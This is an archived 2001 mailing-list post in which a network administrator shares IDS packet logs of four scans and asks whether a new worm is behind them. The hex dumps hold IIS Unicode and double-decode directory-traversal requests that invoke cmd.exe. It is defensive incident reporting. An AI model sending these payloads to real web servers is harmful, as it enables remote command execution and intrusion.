I got these 4 attempts from different sources in a rather small window of
time. They all start out with a portscan of port 80, so I don't think it is
the same person (Why would they need to rescan each time?). You will note
that the order of the variation of the attempts is similar. Is this a new
worm? A new tool?
-Steve
----------------BEGIN SCAN REPORTS----------------------
*****************************SCAN
#1*****************************************
----------------------------------------------------------------------------
--
#(1 - 2059) [2001-05-05 21:20:45] 305
IPv4: 207.51.58.7 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
TCP: port=41385 -> dport: 80 flags=******S* seq=3959699664
ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2081) [2001-05-06 12:06:16] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
TCP: port=42384 -> dport: 80 flags=***AP*** seq=4087665554
ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2082) [2001-05-06 12:06:17] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
TCP: port=42746 -> dport: 80 flags=***AP*** seq=4111537358
ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2083) [2001-05-06 12:06:18] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
TCP: port=43046 -> dport: 80 flags=***AP*** seq=4129406045
ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2084) [2001-05-06 12:06:19] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
TCP: port=44051 -> dport: 80 flags=***AP*** seq=4191243658
ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2085) [2001-05-06 12:06:20] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
TCP: port=45036 -> dport: 80 flags=***AP*** seq=4254676574
ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2086) [2001-05-06 12:06:21] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
TCP: port=45723 -> dport: 80 flags=***AP*** seq=3643186
ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2087) [2001-05-06 12:06:22] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
TCP: port=46489 -> dport: 80 flags=***AP*** seq=54010263
ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2088) [2001-05-06 12:06:23] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
TCP: port=47320 -> dport: 80 flags=***AP*** seq=104581118
ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2089) [2001-05-06 12:06:24] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
TCP: port=48175 -> dport: 80 flags=***AP*** seq=160395667
ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2090) [2001-05-06 12:06:25] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
TCP: port=49033 -> dport: 80 flags=***AP*** seq=213665368
ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2091) [2001-05-06 12:06:26] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
TCP: port=49954 -> dport: 80 flags=***AP*** seq=270239886
ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2092) [2001-05-06 12:06:27] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
TCP: port=50870 -> dport: 80 flags=***AP*** seq=328007726
ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2093) [2001-05-06 12:06:28] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
TCP: port=51840 -> dport: 80 flags=***AP*** seq=378946693
ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2094) [2001-05-06 12:06:29] 56
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
TCP: port=52623 -> dport: 80 flags=***AP*** seq=427404423
ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
****************************SCAN
#2*******************************************
----------------------------------------------------------------------------
--
#(1 - 2075) [2001-05-06 11:25:12] 317
IPv4: 207.78.143.235 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
TCP: port=56344 -> dport: 80 flags=******S* seq=823530689
ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2121) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
TCP: port=57118 -> dport: 80 flags=***AP*** seq=3412786496
ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2122) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
TCP: port=57170 -> dport: 80 flags=***AP*** seq=3415977274
ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2123) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
TCP: port=57326 -> dport: 80 flags=***AP*** seq=3426276033
ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2124) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
TCP: port=64799 -> dport: 80 flags=***AP*** seq=3904402609
ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2125) [2001-05-06 18:08:28] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
TCP: port=65302 -> dport: 80 flags=***AP*** seq=3936366689
ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2126) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
TCP: port=39706 -> dport: 80 flags=***AP*** seq=107054918
ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2127) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
TCP: port=39709 -> dport: 80 flags=***AP*** seq=107263367
ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2128) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108
TCP: port=39965 -> dport: 80 flags=***AP*** seq=124410128
ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2129) [2001-05-06 18:08:30] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102
TCP: port=40329 -> dport: 80 flags=***AP*** seq=148806580
ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2130) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090
TCP: port=40585 -> dport: 80 flags=***AP*** seq=164770468
ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2131) [2001-05-06 18:08:34] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081
TCP: port=43268 -> dport: 80 flags=***AP*** seq=341732227
ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2132) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071
TCP: port=43341 -> dport: 80 flags=***AP*** seq=346538415
ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2133) [2001-05-06 18:08:38] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062
TCP: port=46205 -> dport: 80 flags=***AP*** seq=530846163
ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2134) [2001-05-06 18:08:42] 56
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037
TCP: port=46362 -> dport: 80 flags=***AP*** seq=541605131
ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
***************************SCAN
#3**********************************************************
----------------------------------------------------------------------------
--
#(1 - 2147) [2001-05-07 02:22:21] spp_portscan: PORTSCAN DETECTED from
210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds)
IPv4: 210.107.187.10 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652
TCP: port=50799 -> dport: 80 flags=******S* seq=2338995863
ack=0 off=6 res=0 win=8760 urp=0 chksum=10291
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2181) [2001-05-07 12:01:30] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485
TCP: port=61125 -> dport: 80 flags=***AP*** seq=941135384
ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2182) [2001-05-07 12:01:31] WEB-IIS cmd.exe access
IPv4: 210.107.187.10 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479
TCP: port=61278 -> dport: 80 flags=***AP*** seq=951451170
ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
************************SCAN #4*******************************************
#(1 - 2150) [2001-05-07 03:07:07] 340
IPv4: 202.107.211.177 -> 209.46.94.80
hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406
TCP: port=56725 -> dport: 80 flags=******S* seq=3486124858
ack=0 off=6 res=0 win=8760 urp=0 chksum=61287
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2173) [2001-05-07 10:15:58] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492
TCP: port=32840 -> dport: 80 flags=***AP*** seq=1452480610
ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2174) [2001-05-07 10:16:00] 62
IPv4: 202.107.211.177 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486
TCP: port=33972 -> dport: 80 flags=***AP*** seq=1515064652
ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
This archive was generated by hypermail 2b30 : Tue May 08 2001 - 07:59:32 PDT